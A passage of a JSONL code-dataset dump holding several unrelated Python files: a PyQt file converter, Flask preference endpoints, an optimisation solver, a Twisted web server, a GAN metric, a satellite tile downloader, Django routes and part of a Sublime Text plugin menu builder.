+{"seq_id":"54185913","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'gbrva'\n\nfrom convert import *\nfrom interface import *\nimport sys\nimport os\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon\n\n# Номер збірки\nnumBuild = '01_210915'\n\n\nclass MyWin(QtWidgets.QMainWindow):\n mdlFlag = True\n\n def __init__(self, parent=None):\n QtWidgets.QWidget.__init__(self, parent)\n self.setWindowIcon(QIcon('main.ico'))\n self.ui = Ui_Main()\n self.ui.setupUi(self)\n\n\n # Встановлюємо початкові значення\n self.ui.pushButton.setEnabled(False)\n self.ui.progressBar.setProperty('value', 0)\n\n # Приєднуємо слоти\n self.ui.pushButton.clicked.connect(self.do_convert)\n self.ui.toolButton.clicked.connect(self.do_selectfile)\n self.ui.MoodleBtn.clicked.connect(self.do_moodleClick)\n self.ui.TextBtn.clicked.connect(self.do_textClick)\n\n def do_moodleClick(self):\n self.ui.MoodleBox.setChecked(True)\n self.ui.FotoBox.setChecked(False)\n self.ui.FotoBox.setEnabled(True)\n self.ui.GoogleBox.setChecked(False)\n return None\n\n def do_textClick(self):\n self.ui.MoodleBox.setChecked(True)\n self.ui.FotoBox.setChecked(False)\n self.ui.FotoBox.setEnabled(False)\n self.ui.GoogleBox.setChecked(False)\n\n pass\n\n def do_selectfile(self):\n fname = QtWidgets.QFileDialog.getOpenFileName()[0]\n self.ui.lineEdit.setText(str(fname))\n if fname != '':\n self.ui.pushButton.setEnabled(True)\n return None\n\n def do_convert(self):\n frname = self.ui.lineEdit.text()\n tmpname = os.path.split(frname)\n fwname = os.path.join(tmpname[0], 'mdl_' + tmpname[1])\n text1 = self.ui.outlabel.setText('Output file: ' + fwname)\n if self.ui.MoodleBtn.isChecked():\n Convert_1c(frname, fwname, self.ui.FotoBox.isChecked())\n else:\n Convert_Text(frname, fwname)\n # self.ui.progressBar.setProperty('value', newvalue)\n self.ui.lineEdit.setText('')\n self.ui.pushButton.setEnabled(False)\n return None\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n myapp = MyWin()\n myapp.show()\n sys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"502952583","text":"# -*- encoding: utf-8 -*-\r\nfrom flask import Blueprint\r\nfrom flask import jsonify\r\nfrom flask import request\r\nfrom flask_login import current_user\r\nfrom flask_login import login_required\r\nfrom sqlalchemy import func\r\n\r\nfrom lazyblacksmith.models import SolarSystem\r\nfrom lazyblacksmith.models import TokenScope\r\nfrom lazyblacksmith.models import db\r\n\r\nfrom . import logger\r\n\r\najax_account = Blueprint('ajax_account', __name__)\r\n\r\n\r\n@ajax_account.route('/scopes//', methods=['DELETE'])\r\n@login_required\r\ndef delete_scope(character_id, scope):\r\n \"\"\" Remove a scope for a given character_id from the database \"\"\"\r\n if request.is_xhr:\r\n allowed_character_id = [\r\n alt.character_id for alt in current_user.alts_characters.all()\r\n ]\r\n if (character_id == current_user.character_id or\r\n character_id in allowed_character_id):\r\n try:\r\n TokenScope.query.filter(\r\n TokenScope.user_id == character_id,\r\n TokenScope.scope == scope\r\n ).delete()\r\n db.session.commit()\r\n return jsonify({'status': 'success'})\r\n\r\n except:\r\n logger.exception('Cannot delete scope %s for user_id %s' % (\r\n scope,\r\n character_id,\r\n ))\r\n db.session.rollback()\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error while trying to delete scope'\r\n })\r\n response.status_code = 500\r\n return response\r\n else:\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'This character does not belong to you'\r\n })\r\n response.status_code = 500\r\n return response\r\n else:\r\n return 'Cannot call this page directly', 403\r\n\r\n\r\n@ajax_account.route('/user_preference/', methods=['POST'])\r\n@login_required\r\ndef update_user_industry_preference():\r\n \"\"\" Update the user preferences for industry \"\"\"\r\n if request.is_xhr:\r\n preferences = request.get_json()\r\n\r\n if 'production' in preferences:\r\n return update_production_preference(preferences['production'])\r\n\r\n if 'research' in preferences:\r\n return update_research_preference(preferences['research'])\r\n\r\n if 'invention' in preferences:\r\n return update_invention_preference(preferences['invention'])\r\n else:\r\n return 'Cannot call this page directly', 403\r\n\r\n\r\ndef update_production_preference(preferences):\r\n \"\"\" Called by update_user_industry_preference, update the production\r\n preferences \"\"\"\r\n if preferences:\r\n pref = current_user.pref\r\n\r\n try:\r\n pref.prod_facility = preferences['facility']\r\n pref.prod_me_rig = preferences['meRig']\r\n pref.prod_te_rig = preferences['teRig']\r\n pref.prod_security = preferences['security']\r\n pref.prod_system = check_solar_system(preferences['system'])\r\n pref.prod_sub_facility = preferences['componentFacility']\r\n pref.prod_sub_me_rig = preferences['componentMeRig']\r\n pref.prod_sub_te_rig = preferences['componentTeRig']\r\n pref.prod_sub_security = preferences['componentSecurity']\r\n pref.prod_sub_system = check_solar_system(preferences['componentSystem'])\r\n pref.prod_price_region_minerals = preferences['priceMineralRegion']\r\n pref.prod_price_type_minerals = preferences['priceMineralType']\r\n pref.prod_price_region_pi = preferences['pricePiRegion']\r\n pref.prod_price_type_pi = preferences['pricePiType']\r\n pref.prod_price_region_moongoo = preferences['priceMoongooRegion']\r\n pref.prod_price_type_moongoo = preferences['priceMoongooType']\r\n pref.prod_price_region_others = preferences['priceOtherRegion']\r\n pref.prod_price_type_others = preferences['priceOtherType']\r\n pref.prod_character_id = preferences['characterId']\r\n\r\n db.session.commit()\r\n return jsonify({'status': 'success'})\r\n\r\n except:\r\n logger.exception('Cannot update preferences')\r\n db.session.rollback()\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error while updating preferences'\r\n })\r\n response.status_code = 500\r\n return response\r\n else:\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error: preferences are empty'\r\n })\r\n response.status_code = 500\r\n return response\r\n\r\n\r\ndef update_invention_preference(preferences):\r\n \"\"\" Called by update_user_industry_preference, update the invention\r\n preferences \"\"\"\r\n if preferences:\r\n pref = current_user.pref\r\n\r\n try:\r\n pref.invention_facility = preferences['facility']\r\n pref.invention_invention_rig = preferences['inventionRig']\r\n pref.invention_copy_rig = preferences['copyRig']\r\n pref.invention_security = preferences['security']\r\n pref.invention_system = check_solar_system(preferences['system'])\r\n pref.invention_price_region = preferences['priceRegion']\r\n pref.invention_price_type = preferences['priceType']\r\n pref.invention_character_id = preferences['characterId']\r\n\r\n db.session.commit()\r\n return jsonify({'status': 'success'})\r\n\r\n except:\r\n logger.exception('Cannot update preferences')\r\n db.session.rollback()\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error while updating preferences'\r\n })\r\n response.status_code = 500\r\n return response\r\n else:\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error: preferences are empty'\r\n })\r\n response.status_code = 500\r\n return response\r\n\r\n\r\ndef update_research_preference(preferences):\r\n \"\"\" Called by update_user_industry_preference, update the research\r\n preferences \"\"\"\r\n if preferences:\r\n pref = current_user.pref\r\n\r\n try:\r\n pref.research_facility = preferences['facility']\r\n pref.research_me_rig = preferences['meRig']\r\n pref.research_te_rig = preferences['teRig']\r\n pref.research_copy_rig = preferences['copyRig']\r\n pref.research_security = preferences['security']\r\n pref.research_system = check_solar_system(preferences['system'])\r\n pref.research_character_id = preferences['characterId']\r\n\r\n db.session.commit()\r\n return jsonify({'status': 'success'})\r\n\r\n except:\r\n logger.exception('Cannot update preferences')\r\n db.session.rollback()\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error while updating preferences'\r\n })\r\n response.status_code = 500\r\n return response\r\n else:\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error: preferences are empty'\r\n })\r\n response.status_code = 500\r\n return response\r\n\r\n \r\ndef check_solar_system(system_name):\r\n \"\"\" Check if a solarsystem exists and return the real name from database\r\n (prevents lower/upper case issues) \"\"\"\r\n system = SolarSystem.query.filter(\r\n func.lower(SolarSystem.name) == func.lower(system_name)\r\n ).one_or_none()\r\n return 'Jita' if not system else system.name\r\n ","sub_path":"lazyblacksmith/views/ajax/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":7768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"57058686","text":"#!/usr/bin/env python\nfrom optparse import OptionParser\nimport numpy as np\nimport itertools\nimport matplotlib.pyplot as plt\nimport scipy\nimport scipy.special\nimport sys\nimport matplotlib\nimport scipy.optimize as optimize\nfrom functools import partial\nimport json\n\n# GLOBALS\n\nPARAMETER_P = 2\nPARAMETER_ALPHA = 0.9\nPARAMETER_BETA = 10\nPARAMETER_MULT = 10\nPARAMETER_EPSILON = 0.001\nPARAMETER_PENALTY = 10.0\nPARAMETER_SUM = 0\nPARAMETER_MUL = 6\nRESULT_ITERCOUNT = 0\nRESULT_FUNCTION = 0\nRESULT_POINT = None\nPARAMETER_SRC = \"INPUT\"\nVAR_COUNT = 9\n\n#GLOBALS END\n\ndef linear_combination(c, x):\n return (c.flatten()*x.flatten()).sum()\n\ndef stohastic_programming_function(alpha, a, sigma, b, start, x):\n return b - (linear_combination(a, x) +\n scipy.special.erfinv(alpha) * (((sigma ** 2) * (x**2)).sum() ** 0.5));\n\ndef linear_combination_minus_number(c, b, x):\n return (x * c).sum() - b\n\ndef generate_functions(alpha, S, table, b, d):\n m, n, k = table.shape\n xij = \"%s_{%d%d}\"\n pattern = \"%.2f%s\"\n x_template = \"x\"\n arguments_length = int(n / S * m)\n length = int(n / S)\n fp = open(\"MATRIX_IN\", \"w\")\n fp.write(\"%d %d %d\\n\" % (m, n, S))\n for row in range(m):\n for k_ in range(S):\n a, sigma = np.zeros(arguments_length), np.zeros(arguments_length)\n coefs = table[row, k_::S]\n za = [(i + j) / 2.0 for i,j in coefs ]\n zsigma = [((i - j)**2) / 12.0 for i,j in coefs ]\n for i, pair in enumerate(zip(za, zsigma)):\n a[row * length + i ] = pair[0]\n sigma[row*length + i] = pair[1]\n\n line = \" \".join( str(i) for i in itertools.chain(a, sigma))\n fp.write(\"%s %d\\n\" % (line, b[row * 2 + k_]))\n yield partial(stohastic_programming_function,\n alpha, a, sigma, b[row * 2 + k_], row)\n fp.close()\n for row in range(m):\n coeficients = np.zeros(arguments_length)\n ones = np.ones(length)\n for i, pair in enumerate(ones):\n coeficients[row * length + i ] = pair\n yield partial(linear_combination_minus_number, coeficients, d[row]) \n\n for i in range(arguments_length):\n yield partial(lambda i, x: x[i], i)\n\n\ndef data():\n global VAR_COUNT\n ALPHA = PARAMETER_ALPHA\n fp = open(PARAMETER_SRC)\n rows_count = int(fp.readline())\n table = []\n k = 0\n \n for line in fp:\n stripped = line.strip()\n data = [float(i) for i in stripped.split(\" \")]\n table.append([]) \n for i in range(0, len(data), 2): \n table[k].append((data[i], data[i + 1]))\n k += 1\n if k == rows_count:\n break\n line = fp.readline().strip(\" \")\n line2 = fp.readline().strip(\" \")\n line3 = fp.readline().strip(\" \")\n table = np.array(table)\n c_mult = 1\n m = PARAMETER_SUM\n d = np.array([float(i) for i in line.split(\" \")]) + m\n c = np.array([float(i) for i in line2.split(\" \")]).flatten() * c_mult\n b = np.array([float(i) for i in line3.split(\" \")]) * PARAMETER_MUL\n VAR_COUNT = len(c)\n S = 2\n fp.close()\n return ALPHA, S, table, c, d, b\n\n\ndef get_data(alphs, s, table, c, d, b):\n needle = partial(linear_combination, c)\n functions = list(generate_functions(alphs, s, table, b, d))\n return needle, functions\n\n\ndef default_penalty_function(g):\n return lambda x: max(0, -g(x))**PARAMETER_P\n \n\ndef alpha_function(restrictions, penalty_function=default_penalty_function):\n return lambda x: sum(default_penalty_function(f)(x) for f in restrictions)\n\n\ndef composition(functions, reducer=sum):\n return lambda x0: reducer(foo(x0) for foo in functions)\n\n\ndef penalty_optimize_step(needle, alpha, penalty, x0):\n foo = lambda x: needle(x) + penalty * alpha(x)\n return optimize.minimize(foo, x0, method='Nelder-Mead', options={\"maxiter\": 100000, \"maxfev\": 100000}), foo\n \n\ndef penalty_optimize(needle_function, restrictions, x0, beta=2.0, epsilon=0.00001, penalty=1):\n cols_n = len(x0)\n x0 = np.array(x0)\n alpha = alpha_function(restrictions)\n fit, penalty_function = penalty_optimize_step(needle_function, alpha, penalty, x0)\n iterations_count = 1\n while alpha(fit.x) * penalty > epsilon:\n fit, penalty_function = penalty_optimize_step(needle_function, alpha, penalty, [int(max(0, x)) for x in fit.x])\n penalty *= beta\n iterations_count += 1\n global RESULT_ITERCOUNT, RESULT_POINT, RESULT_FUNCTION\n RESULT_ITERCOUNT = iterations_count\n RESULT_POINT = np.array([int(x) for x in fit.x])\n RESULT_FUNCTION = needle_function(RESULT_POINT)\n return fit, penalty_function, alpha\n\n\ndef main(args):\n #global PARAMETER_P\n #PARAMETER_P = 2#float(input())\n in_data = data()\n needle, functions = get_data(*in_data)\n x0 = np.zeros(VAR_COUNT) \n fit, foo, alpha = penalty_optimize(needle, functions, x0, epsilon=PARAMETER_EPSILON, penalty=PARAMETER_PENALTY, beta=PARAMETER_BETA)\n res = np.array([int(x) for x in fit.x])\n\n\ndef prepare_globals(options):\n global PARAMETER_SUM, PARAMETER_ALPHA, PARAMETER_BETA, PARAMETER_EPSILON, PARAMETER_PENALTY, PARAMETER_SUM, PARAMETER_MUL, PARAMETER_SRC\n if options.alpha != None:\n PARAMETER_ALPHA = float(options.alpha)\n if options.p != None:\n PARAMETER_P = float(options.p)\n if options.epsilon != None:\n PARAMETER_EPSILON =float(options.epsilon)\n if options.r != None:\n PARAMETER_PENALTY = options.r\n if options.rmultiplier != None:\n PARAMETER_MUL = options.rmultiplier\n if options.planplus != None:\n PARAMETER_SUM = options.planplus\n if options.src != None:\n PARAMETER_SRC = options.src\n\n\ndef parseOptions():\n global PARAMETER_SUM, PARAMETER_ALPHA, PARAMETER_BETA, PARAMETER_EPSILON, PARAMETER_PENALTY, PARAMETER_SUM, PARAMETER_MUL\n parser = OptionParser()\n parser.add_option(\"-s\", \"--src\", dest=\"src\", help=\"setup src for input\", metavar=\"INPUT_FILE\")\n parser.add_option(\"-p\", \"--p\", dest=\"p\", help=\"setup power for penalty-functions methods\", metavar=\"POW_PENALTY\")\n parser.add_option(\"-e\", \"--epsilon\", dest=\"epsilon\", help=\"how precise your solution would be\", metavar=\"EPSILON\")\n parser.add_option(\"-r\", \"--r\", dest=\"r\", help=\"value for r at penalty-functions method\", metavar=\"DEFAULT_MULTIPLIER\")\n parser.add_option(\"-b\", \"--beta\", dest=\"beta\", help=\"value for beta-multiplier for penalty_functions method\", metavar=\"BETA\")\n parser.add_option(\"-a\", \"--alpha\", dest=\"alpha\", help=\"probability\", metavar=\"ALPHA\")\n parser.add_option(\"-R\", \"--rmultiplier\", dest=\"rmultiplier\", help=\"RESOURCE-multiplier\", metavar=\"RMULTIPLIER\")\n parser.add_option(\"-P\", \"--planplus\", dest=\"planplus\", help=\"Plan-variations\", metavar=\"PLANPLUS\")\n (options, args) = parser.parse_args()\n prepare_globals(options)\n\n\nif __name__ == '__main__':\n# try:\n parseOptions()\n main([])\n encoder = json.JSONEncoder()\n data = {\"itn\": RESULT_ITERCOUNT, \"f\": RESULT_FUNCTION, \"xOpt\": list(RESULT_POINT.tolist())}\n print(encoder.encode(data))\n# except Exception as e:\n# print(\"UNSATISFIED requirements for input-file\")\n","sub_path":"python-application/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":7157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"445844054","text":"# encoding:utf-8\nimport logging\nfrom twisted.web import resource\nfrom twisted.web.server import Site\nfrom twisted.internet import reactor\nimport weixin\nimport youmi\nimport config\n\n\nclass WebSite(object):\n def __init__(self):\n self.port = None\n self.root = None\n self.reg_map = {}\n\n def register(self, path, page):\n logging.info(u'WebSite.register() path=%s', path)\n if self.root:\n self.root.putChild(path, page)\n else:\n self.reg_map[path] = page\n\n def start(self):\n self.root = resource.Resource()\n self.root.putChild(\"wx\", weixin.instance)\n self.root.putChild(\"youmi\", youmi.instance)\n for path, page in self.reg_map.iteritems():\n self.root.putChild(path, page)\n self.reg_map.clear()\n self.port = reactor.listenTCP(config.instance.web_port, Site(self.root))\n\n def stop(self):\n self.port.stopListening()\n\n\ninstance = WebSite()\n","sub_path":"gamecenter/website.py","file_name":"website.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"229376468","text":"import metrics.metrics as metrics\nimport metrics.inception_processing as inception_processing\nimport utilities.directories as directories\nimport training.config as config\nimport numpy as np\nfrom tqdm import tqdm\nimport tensorflow as tf\n\nclass DiscriminativeMetric:\n name = 'discriminative metric'\n number_of_batches_for_one_file = 4\n\n def __init__(self, discriminator):\n self.discriminator = discriminator\n\n def evaluate(self,\n session,\n generator,\n real_data,\n number_activations_in_one_metric_calculation=1024,\n number_of_activations_batches=10):\n number_of_batches = number_activations_in_one_metric_calculation // config.batch_size\n\n score_list_real = []\n score_list_fake = []\n\n progressbar_frechett_calculations = tqdm(\n range(number_of_activations_batches))\n real_logits = []\n fake_logits = []\n fake_logit_op = self.discriminator(generator.call_without_input())\n real_data = tf.reshape(real_data,\n shape=(config.batch_size, 3,\n generator.resolution,\n generator.resolution)) \n real_logit_op = self.discriminator(real_data)\n for batch in progressbar_frechett_calculations:\n for i in range(number_of_batches):\n fake_logit = session.run(fake_logit_op)\n real_logit = session.run(real_logit_op)\n fake_logits.append(fake_logit)\n real_logits.append(real_logit)\n\n score_real = np.mean(np.concatenate(real_logits))\n score_fake = np.mean(np.concatenate(fake_logits))\n fake_logits.clear()\n real_logits.clear() \n print('Calculated score for real is ' + str(score_real) + 'for fake is '+ str(score_fake))\n score_list_real.append(score_real)\n score_list_fake.append(score_fake)\n \n np_scores_real = np.asarray(score_list_real)\n np_scores_fake = np.asarray(score_list_fake)\n\n avg_real, std_real = np.mean(np_scores_real), np.std(np_scores_real)\n avg_fake, std_fake = np.mean(np_scores_fake), np.std(np_scores_fake)\n\n print('real ' + self.name + ' avg: {} std: {}'.format(avg_real, std_real))\n print('fake ' + self.name + ' avg: {} std: {}'.format(avg_fake, std_fake))\n\n return avg_fake, std_fake\n\n def get_name(self):\n return self.name","sub_path":"metrics/DiscriminativeMetric.py","file_name":"DiscriminativeMetric.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"186366903","text":"\n\"\"\"\nGet satellite data tiles at various levels of detail\n\"\"\"\n\nimport urllib.request\nimport os.path\nimport subprocess\n\n#testfile = urllib.URLopener()\n#testfile.retrieve(\"http://randomsite.com/file.gz\", \"file.gz\")\n\n#lod=3\n#r=1\n#c=1\n#tilefile = urllib.URLopener()\n#with urllib.request.urlopen('http://python.org/') as response:\n# html = response.read()\nlod=13\nyext=(120,147)\nxext=(75,99)\n\nfor r in range(*yext):\n for c in range(*xext):\n filename = \"rawdata/satellite/lod13/tile_r%d_c%d_lod%d.jpg\" % (r,c,lod)\n if os.path.isfile(filename):\n print(\"already got %s\" % filename)\n else:\n print(\"downloading %s\" % filename)\n response = urllib.request.urlopen(\"http://gistiles3.arso.gov.si/nukleus_tiles/Gis/NukleusTiles/v50/AgccTile.ashx?gcid=lay_AO_DOF_2014&r=%d&c=%d&lod=%d&lid=lay_ao_dof_2014&f=jpg\" % (r,c,lod))\n data = response.read()\n file = open(filename)\n file.write(data)\n file.close()\n\n#print (\"Reconstruct with montage 'tile_r*_c*_lod%d.jpg' -geometry +0+0 -tile %dx%d montage.jpg\" % (lod,xext[1]-xext[0],yext[1]-yext[0]))\ncommand = \"montage 'tile_r*_c*_lod%d.jpg' -geometry +0+0 -tile %dx%d montage.jpg\" % (lod,xext[1]-xext[0],yext[1]-yext[0])\nprint(\"Run this manually: \",command)\n#subprocess.run(command, shell=True)\n\n#The following have been identified as a location matching the 9th level of detail images to their physical location\n#If the yextent or xextent are changed, this point will need to be moved.\n#The top left hand corner of the tile with image coordinates 1614,4800 corresponds with the top left of the 403000,123000 1km square.\nfixedImageX=3618\nfixedImageY=3479\nwidth1kmTile=377\nfixedX=405\nfixedY=123\n\n\n\n\n## LOD 9 Calibrations:\n\n\n\n\n#The offset from GK to TM \n#tm_x_offset = 1397\n#tm_y_offset = 1805\n\n\n\n\nfor ix in range(-11,10):\n for iy in range(-8,10):\n command = \"convert .\\montage.jpg -crop %dx%d+%d+%d -resize 256x256 assets/satellite/96TM/256/%d_%d.jpg\" % (width1kmTile,width1kmTile,fixedImageX+ix*width1kmTile,fixedImageY+iy*width1kmTile,fixedX+ix,fixedY+1-iy)\n print(command)\n #subprocess.run(command, shell=True)\n\n\n\n\n\n#http://gistiles3.arso.gov.si/nukleus_tiles/Gis/NukleusTiles/v50/AgccTile.ashx?gcid=lay_AO_DOF_2014&r=1&c=1&lod=3&lid=lay_ao_dof_2014&f=jpg\n","sub_path":"src/retrieveSatelliteTiles.lod13.py","file_name":"retrieveSatelliteTiles.lod13.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"433507083","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url (r'signup/', views.signup, name=\"signup\"),\n url (r'login/', views.login, name=\"login\"),\n url (r'toll_locations/', views.locations, name=\"toll_locations\"),\n url (r'qrgen/', views.qrgen, name=\"qrgen\"),\n url (r'payment/', views.payment, name=\"payment\"),\n url (r'auth/', views.auth, name=\"auth\"),\n url (r'details/', views.userdetails, name=\"details\"),\n url (r'payment2/', views.pay2, name=\"pay2\")\n]\n","sub_path":"rest_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"17963371","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport os\nimport sublime\nimport codecs\nimport json\nimport shutil\n\nfrom . import DeviotCommands\nfrom . import DeviotPaths\n\nclass JSONFile(object):\n\t\"\"\"Handle JSON Files\n\t\n\tThis class allow to load and save JSON files\n\t\"\"\"\n\tdef __init__(self, path):\n\t\t\"\"\"JSONFile Construct\n\t\t\n\t\tThis construct load a file when is called and\n\t\tload the information in a global variable\n\t\t\n\t\tArguments:\n\t\t\tpath {string} -- Full path of the JSON file\n\t\t\"\"\"\n\t\tsuper(JSONFile, self).__init__()\t\t\n\t\tself.setEncoding()\n\t\tself.data = {}\n\t\tself.path = path\n\t\tself.loadData()\t\t\n\n\tdef loadData(self):\n\t\t\"\"\"Load JSON File\n\t\t\n\t\tLoad the content of a JSON file and \n\t\tdeserialize it to set the information \n\t\tin a global object called data\n\t\t\"\"\"\n\t\ttry:\n\t\t\ttext = self.readFile()\n\t\texcept:\n\t\t\treturn\n\t\t\t\n\t\ttry:\n\t\t\tself.data = json.loads(text)\n\t\texcept:\n\t\t\tpass\n\n\tdef getData(self):\n\t\t\"\"\"Ouput data\n\t\t\n\t\tIt's an alternative way to get the data obtained from\n\t\tthe JSON file. The other way is using only the \"data\"\n\t\tglobal object.\n\n\t\tReturns:\n\t\t\t{miltiple} -- mutiple type of data stored in the \n\t\t\t\t\t\t differents files.\n\t\t\"\"\"\n\t\treturn self.data\n\n\tdef setData(self, data):\n\t\t\"\"\"Set the JSON data\n\t\t\n\t\tSave the data in the file setted on the\n\t\tconstruct. This method is most used in \n\t\tthe preferences class.\n\t\t\n\t\tArguments:\n\t\t\tdata {string} -- data to save in the JSON file.\n\t\t\"\"\"\n\t\tself.data = data\n\t\tself.saveData()\n\n\tdef saveData(self):\n\t\t\"\"\"Save JSON data\n\t\t\n\t\tSerialize the data stored in the global object data\n\t\tand call to Write file. This function is called automatically\n\t\twhen any data is set in the method SetData.\n\t\t\n\t\t\"\"\"\n\t\ttext = json.dumps(self.data, sort_keys=True, indent=4)\n\t\tself.writeFile(text)\n\n\tdef readFile(self):\n\t\t\"\"\"Read File\n\t\t\n\t\tRead the data from the file specified in the global object path.\n\t\tThe data readed is encoded with the format specified in the global\n\t\tobject encoding, by default this object is UTF-8. Use this method \n\t\tif you don't want to modify the data received from the file.\n\n\t\tReturns:\n\t\t\ttext {string} -- encoded text readed from file\n\t\t\"\"\"\n\t\ttext = ''\n\n\t\ttry:\n\t\t\twith codecs.open(self.path, 'r', self.encoding) as file:\n\t\t\t\ttext = file.read()\n\t\texcept (IOError, UnicodeError):\n\t\t\tpass\n\n\t\treturn text\n\n\tdef writeFile(self, text, append=False):\n\t\t\"\"\"Write File\n\t\t\n\t\tWrite the data passed in a file specified in the global object path.\n\t\tThis method is called automatically by saveData, and encode the text\n\t\tin the format specified in the global object encoding, by default this\n\t\tobject is UTF-8. Use this method if you don't want to modify the data\n\t\tto write.\n\t\t\n\t\tArguments:\n\t\t\ttext {string} -- Text to write in the file\n\t\t\n\t\tKeyword Arguments:\n\t\t\tappend {boolean} -- Set to True if you want to append the data in the file (default: False)\n\t\t\"\"\"\n\t\tmode = 'w'\n\n\t\tif append:\n\t\t\tmode = 'a'\n\t\ttry:\n\t\t\twith codecs.open(self.path, mode, self.encoding) as file:\n\t\t\t\tfile.write(text)\n\t\texcept (IOError, UnicodeError):\n\t\t\tpass\n\n\tdef setEncoding(self, encoding='utf-8'):\n\t\t\"\"\"Change encoding\n\t\t\n\t\tCall this method to change the format to encode the files when you \n\t\tload it or save it.\n\t\t\n\t\tKeyword Arguments:\n\t\t\tencoding {string} -- Format to encoding (default: UTF-8 )\n\t\t\"\"\"\n\t\tself.encoding = encoding\n\nclass Menu(object):\n\t\"\"\"Plugin Menu\n\t\n\tClass to handle the differents option in the plugin menu.\n\t\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"Construct\n\t\t\n\t\tCall the construct of the command library to make the\n\t\tdifferents call by CLI\n\t\t\"\"\"\n\t\tsuper(Menu, self).__init__()\n\t\tself.Command = DeviotCommands.CommandsPy()\n\n\tdef saveAPIBoards(self):\n\t\t\"\"\"Save board list\n\t\t\n\t\tSave the JSON object in a specific JSON file\n\t\t\"\"\"\n\t\tboards = PlatformioCLI().getAPIBoards()\n\n\t\tfile = JSONFile(DeviotPaths.getDeviotBoardsPath())\n\t\tfile.setData(boards)\n\t\tfile.saveData()\n\n\tdef getFileBoards(self):\n\t\t\"\"\"Get Board File\n\t\t\n\t\tLoad the board list stored in a JSON file and \n\t\treturn the data. This function is used to avoid\n\t\talways download the list from the web.\n\n\t\tReturns:\n\t\t \t{json object} -- list with all boards in a JSON format\n\t\t\"\"\"\n\t\tfile = JSONFile(DeviotPaths.getDeviotBoardsPath())\n\t\tboards = file.getData()\n\t\treturn boards\n\n\tdef createBoardsMenu(self):\n\t\t\"\"\"Board menu\n\t\t\n\t\tLoad the JSON file with the list of all boards and re order it\n\t\tbased on the vendor. after that format the data to operate with\n\t\tthe standards required for the ST\n\n\t\tReturns:\n\t\t \t{json array} -- list of all boards to show in the menu\n\t\t\"\"\"\n\t\tvendors = {}\n\t\tboards = []\n\t\t\n\t\tdatas = json.loads(self.getFileBoards())\n\n\t\tfor datakey,datavalue in datas.items():\n\t\t\tfor infokey,infovalue in datavalue.items():\n\t\t\t\tvendor = datavalue['vendor']\n\t\t\t\tif(infokey == 'name'):\n\t\t\t\t\tname = infovalue.replace(vendor + \" \",\"\",1)\n\t\t\t\t\tchildren = vendors.setdefault(vendor,[])\n\t\t\t\t\tchildren.append({\"caption\":name,'command':'select_board',\"id\":datakey,\"checkbox\":True,\"args\":{\"board_id\":datakey}})\n\n\t\tfor vendor, children in vendors.items():\n\t\t\tboards.append({\"caption\":vendor,\"children\":children})\n\n\t\tboards = sorted(boards, key=lambda x:x['caption'])\n\t\tboards = boards\n\t\t\n\t\treturn boards\n\n\tdef createSerialPortsMenu(self):\n\t\t\"\"\"Serial ports\n\t\t\n\t\tCreate the list menu \"Serial ports\" with the list of all the\n\t\tavailables serial ports\n\t\t\"\"\"\n\n\t\tmenu_path_preset = DeviotPaths.getDeviotMenuPath('serial')\n\t\tmenu_preset = JSONFile(menu_path_preset)\n\t\tmenu_preset = menu_preset.getData()\n\n\t\tport_list = PlatformioCLI().getAPICOMPorts()\n\n\t\tmenu_ports = []\n\t\t\n\t\tfor port in port_list:\n\t\t\tport_name = port[\"port\"]\n\t\t\tmenu_ports.append({\"caption\":port_name,\"command\":\"select_port\",\"checkbox\":True,\"args\":{\"id_port\":port_name}})\n\n\t\tmenu_preset[0]['children'][0]['children'] = menu_ports\n\n\t\tserial_menu_path = DeviotPaths.setDeviotMenuPath('serial')\n\t\tserial_menu = JSONFile(serial_menu_path)\n\t\tserial_menu.setData(menu_preset)\n\t\tserial_menu.saveData()\n\n\n\tdef createMainMenu(self):\n\t\t\"\"\"Main menu\n\t\t\n\t\tCreates the main menu with the differents options\n\t\tincluding boards, libraries, COM ports, and user\n\t\toptions.\n\t\t\"\"\"\n\t\tself.createSerialPortsMenu()\n\n\t\tboards = self.createBoardsMenu()\n\n\t\tmain_file_path = DeviotPaths.getMainJSONFile()\n\t\tmenu_file = JSONFile(main_file_path)\n\t\tmenu_data = menu_file.data[0]\n\n\t\tfor fist_menu in menu_data:\n\t\t\tfor second_menu in menu_data[fist_menu]:\n\t\t\t\tif 'children' in second_menu:\n\t\t\t\t\tif(second_menu['id'] == 'initialize'):\n\t\t\t\t\t\tsecond_menu['children'] = boards\n\t\t\n\t\t# to format purposes\n\t\tmenu_data = 